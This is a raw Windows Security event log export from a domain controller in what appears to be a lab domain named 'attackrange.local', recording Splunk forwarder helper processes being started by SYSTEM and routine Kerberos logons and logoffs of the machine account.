Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:26:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264643
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd50
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:26:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264645
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x880
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:26:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264646
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1588
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:26:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264648
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1458
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:26:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264647
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a08
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:26:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264651
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84798D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:26:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264650
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x84798D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53548
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:26:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264649
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84798D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:27:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264652
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1910
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:27:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264654
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf74
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:27:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264653
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1744
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:27:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264655
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x868
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:27:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264657
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xfe4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:27:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264656
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1ac8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:27:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264658
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1360
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264664
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84A8E0
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264663
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x84A8E0
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53556
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264662
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84A8E0
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264661
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84A874
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264660
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x84A874
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 53555
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:27:22 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264659
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84A874
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:27:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264667
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x84B54C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:27:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264666
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x84B54C
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 53564
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:27:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264665
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
